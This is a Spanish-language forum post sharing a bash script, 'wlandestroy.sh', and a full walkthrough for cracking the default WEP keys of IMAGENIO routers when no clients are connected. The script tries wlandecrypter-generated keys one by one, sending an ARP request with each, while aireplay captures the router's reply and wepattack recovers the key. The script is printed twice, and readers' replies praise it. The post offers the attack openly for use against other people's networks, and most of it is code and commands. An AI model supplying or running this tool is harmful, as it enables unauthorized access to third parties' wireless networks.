Autor
ATENCIÓN: Este método esta obsoleto, prueba el nuevo wlaninject, es mucho más rápido:
¿Quien dijo que sin paquetes y sin clientes de ningun tipo no se podia crackear una wep?
El frotar se va a acabar chic@s!
Con este script podeis conseguir paquetes en redes IMAGENIO sin necesidad de tener clientes wireless ni clientes cableados. La idea es muy sencilla, como no tenemos clientes ni paquetes el script se conecta a la red y prueba todas las claves posibles enviando una peticion arp por cada clave; por otra parte, usaremos aireplay para capturar los paquetes procedentes del AP (es decir, con el flag FromDS activado). Una vez que lo tengamos usamos el metodo "tradicional" con wepattack, wepdecrypt o weplab.
Necesitais:
wlandecrypter http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/5
arping2 http://www.habets.pp.se/synscan/programs.php?prog=arping
aireplay http://www.aircrack-ng.org/doku.php#download
wepattack https://sourceforge.net/project/showfiles.php?group_id=65063&release_id=119469
y linux (pregunta al friki mas cercano)
El codigo del script es el siguiente:
Código:
#!/bin/sh
#
# ENTRADAS:
#
# $1 : Interfaz
# $2 : Essid
# $3 : AP
# $4 : Channel
# $5 : keys.txt
#
if [ $# -lt 5 ]; then
echo "$0 '[Interfaz] [Essid] [AP] [Chan] [keys]'"
exit 1
fi
iwconfig $1 mode managed
iwconfig $1 essid $2
iwconfig $1 ap $3
iwconfig $1 channel $4
iwconfig $1 key s:AAAAAAAAAAAAA
echo -n " * Esperando conexion: "
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -n "."
sleep 1;
done
echo " OK"
ifconfig $1 192.168.1.254
count=0
count_echo=0
for i in `cat $5`; do
iwconfig $1 key s:$i
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -en "\r * Conexion perdida, esperando..."
sleep 1;
done
arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
count=$((count+1))
count_echo=$((count_echo+1))
if [ $count_echo -ge 50 ]; then
echo -en "\r * Claves probadas: $count"
count_echo=0
fi
done
Este codigo lo puedes encontrar tambien en formato GunZip en http://www.megaupload.com/es/?d=DZPNE14W#
# ENTRADAS:
#
# $1 : Interfaz
# $2 : Essid
# $3 : AP
# $4 : Channel
# $5 : keys.txt
#
if [ $# -lt 5 ]; then
echo "$0 '[Interfaz] [Essid] [AP] [Chan] [keys]'"
exit 1
fi
iwconfig $1 mode managed
iwconfig $1 essid $2
iwconfig $1 ap $3
iwconfig $1 channel $4
iwconfig $1 key s:AAAAAAAAAAAAA
echo -n " * Esperando conexion: "
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -n "."
sleep 1;
done
echo " OK"
ifconfig $1 192.168.1.254
count=0
count_echo=0
for i in `cat $5`; do
iwconfig $1 key s:$i
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -en "\r * Conexion perdida, esperando..."
sleep 1;
done
arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
count=$((count+1))
count_echo=$((count_echo+1))
if [ $count_echo -ge 50 ]; then
echo -en "\r * Claves probadas: $count"
count_echo=0
fi
done
Lo guardais como wlandestroy.sh o con otro nombre que os guste mas
.Le dais permisos de ejecución ...
Código:
chmod u+x ./wlandestroy.sh
Y los pasos a seguir son los siguientes:
- Buscais la red:
- Capturar paquete procedente del AP:
[/list]
Código:
aireplay -4 -b {BSSID} -f1 ath0
Si el router es un Comtrend 536+ (00:16:38:XX:XX:XX) es conveniente usar Código:
aireplay -4 -b {BSSID} -n86 -m86 -f1 ath0
para que solo pille las respuestas arp, porque este router es un poco cabroncete.NOTA: Se puede usar de otras formas, yo he usado esta porque lo he probado esta mañana y no he andao investigando mas.
Si no os funciona usad ath0raw para capturar paquetes en vez de ath0
- Generar el archivo de claves:
Código:
wlandecrypter {BSSID} {ESSID} {fichero_claves}
- Probar todas las claves:
Código:
./wlandestroy.sh {INTERFAZ} {ESSID} {BSSID} {CANAL} {fichero_claves}
Cuando el script pase por la clave correcta el AP respondera con un arp y en la consola en la que esta el aireplay saldra un paquete, pulsais "y" para que se guarde y entonces el aireplay intentara hacer un chop-chop... pulsais Control+C para que no lo haga puesto que no nos interesa. Hacemos lo mismo en la consola donde esta el script para que no siga probando claves.- descifrar el paquete:
Código:
wepattack -f replay_arp-XXXX-XXXXXX.cap -w {fichero_claves}
El script tarda mas o menos segun cuales sean los digitos de la clave, porque los prueba secuencialmente desde 0000 hasta FFFF, es decir, si la clave es Z001349F644F9 tardara mas que si es Z0013490059F9. Como mucho a mi me ha tardado unos 10-15 minutos.
NOTA: Este script solo funciona si la ip del router es 192.168.1.1, tambien podeis probar a sustituir la linea
Código:
arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
porCódigo:
arping2 -i$1 -c1 -w0 $3 > /dev/null 2>&1
asi en vez de mandar la peticion arp a la ip 192.168.1.1 la intenta mandar a la mac del ap (esto no funciona siempre).No se os olvide que esto solo es posible para las redes con la clave que viene por defecto.
Espero que os sea util...
Referencia: http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/13
En línea
esta tarde lo pruebo y os cuento
Fántastico script !! 
